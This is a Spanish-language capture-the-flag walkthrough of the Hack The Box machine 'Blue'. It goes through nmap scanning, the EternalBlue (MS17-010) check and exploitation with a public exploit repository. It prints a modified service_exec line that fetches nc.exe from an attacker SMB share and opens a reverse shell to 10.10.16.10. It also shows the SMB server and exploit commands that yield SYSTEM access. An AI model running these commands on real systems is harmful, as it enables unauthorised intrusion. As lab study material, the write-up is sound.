# Blue

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2Fl1cle95zTQkqdZFNXhwc%2FBlue.png?alt=media&#x26;token=75f0309d-1854-4c5e-ba23-0658b068220e" alt=""><figcaption></figcaption></figure>

Comenzamos la maquina enumerando los puertos abiertos con nmap, enumeraremos todos los puertos con el parámetro **-p-** y filtraremos solo los puertos que estén abiertos.

```bash
sudo nmap -p- --open -sS -min-rate 5000 -Pn -n 10.129.142.93 -oG allPorts
```

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FROZgh2XZUA5fISykpnNc%2Fimage.png?alt=media&#x26;token=98062afe-e0a8-4a72-9b59-2c323b0cd744" alt=""><figcaption></figcaption></figure>

Aquí vemos los puertos abiertos de la maquina victima, vamos a lanzar una enumeración para que nos muestre más información de los servicios, como versiones, Dominio, Aplicación.

```bash
nmap -sCV -p135,139,445,49152,49153,49154,49155,49156,49157 10.129.142.93 -Pn -oN target
```

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FlFyrCZ9dLxoOY8ijqhpP%2Fimage.png?alt=media&#x26;token=225a9e28-43ea-4084-b932-9ab25a4b99c4" alt=""><figcaption></figcaption></figure>

En el reporte de nmap, vemos que tenemos un windows 7 con un SMB abierto, vamos a lanzar nuevamente nmap con un script para detectar si es vulnerable a EternalBlue.

```bash
nmap -p445 --script smb-vuln-ms17-010 10.129.142.93
```

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FsM5rQyz3qjGbfVkGZgWl%2Fimage.png?alt=media&#x26;token=cbad6ce9-685f-4ad2-8202-d3764482bd0c" alt=""><figcaption></figcaption></figure>

Buscamos la IDs que nos da nmap en Google. También podemos buscarlo por (ms17-010).

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FFX0cgJGvR3dnGwjuHhrr%2Fimage.png?alt=media&#x26;token=22eae4ca-2b40-4be7-b319-62071d6fdcfb" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Permite a atacantes remotos ejecutar código arbitrario a través de paquetes diseñados, también conocida como "vulnerabilidad de ejecución remota de código SMB en Windows".

<https://nvd.nist.gov/vuln/detail/cve-2017-0143>
{% endhint %}

Vamos a ver si tenemos algún repositorio en github con un exploit para explotar el EternalBlue.

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FxTonbyUo0Xi7n1eWYu01%2Fimage.png?alt=media&#x26;token=0d3ff84b-e639-4abb-924d-3eec48a2d233" alt=""><figcaption></figcaption></figure>

Descargamos el repositorio <https://github.com/worawit/MS17-010> en nuestro equipo.

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FGvurEc3Rx9H47YJPJwiz%2Fimage.png?alt=media&#x26;token=0b8d47b9-f95d-4229-8458-be90d6e925dc" alt=""><figcaption></figcaption></figure>

Tenemos varios archivos, vamos a ejecutar de primeras checker.py, en este caso si lo ejecutamos no nos dará la información que necesitamos.

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FiIk7RflCJlPdr7BsDw4k%2Fimage.png?alt=media&#x26;token=fe4211ac-198b-42b7-abd1-59b13bead9de" alt=""><figcaption></figcaption></figure>

Vamos a editar el archivo y simplemente le añadiremos un usuario "GUEST", ya que la conexión de invitados esta disponible.

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FbylU0WvMx2hdMVvzeFKy%2Fimage.png?alt=media&#x26;token=58177835-6955-4b45-b54c-82f81c1bfb00" alt=""><figcaption></figcaption></figure>

Al volver a lanzarlo, vemos que la cosa cambia.

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FHzF6L8r4LqSzeW1VBP7e%2Fimage.png?alt=media&#x26;token=d4d2658f-a366-425c-83d4-7a2ef6f95256" alt=""><figcaption></figcaption></figure>

Tenemos varios pipes que podremos usar mas adelante. Ahora vamos a configurar el archivo zzz\_exploit.py.

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FX68egYH5DDM3kzhT8Ka4%2Fimage.png?alt=media&#x26;token=963c2e97-d2bb-4933-a093-aa9290239c0b" alt=""><figcaption></figcaption></figure>

Marcamos todas las líneas de comandos y desmarcamos la línea de **service\_exec**.

Recordar añadir el usuario **GUEST** como hicimos en el archivo checker.py y modificar la línea con el comando que queramos que ejecute la maquina victima.

```bash
service_exec(conn, r'cmd /c \\10.10.16.10\smbFolder\nc.exe -e cmd 10.10.16.10 443')
```

Ahora tenemos que buscar el ejecutable **nc.exe** y compartir un recurso compartido para que la maquina victima lo ejecute y nos de una reverse shell.

```bash
impacket-smbserver smbFolder $(pwd) -smb2support
```

Ahora nos ponemos en escucha con netcat, y ejecutamos el archivo zzz\_exploit.py con un pipe valido, que hemos obtenido anteriormente con el checker.py, en este caso usare el pipe samr.

```bash
python2.7 zzz_exploit.py 10.129.142.93 samr
```

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FS3hDFDkQWOaRcdoFM47W%2Fimage.png?alt=media&#x26;token=1257097d-c1a0-4ba1-8991-7a94d2742f48" alt=""><figcaption></figcaption></figure>

Conseguimos una reverse shell como **nt authority\system.**

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FzVPhAXSjU1lvDzI05Rsr%2Fimage.png?alt=media&#x26;token=f55b46bb-a9b8-48d8-bab2-7210e4c6db4a" alt=""><figcaption></figcaption></figure>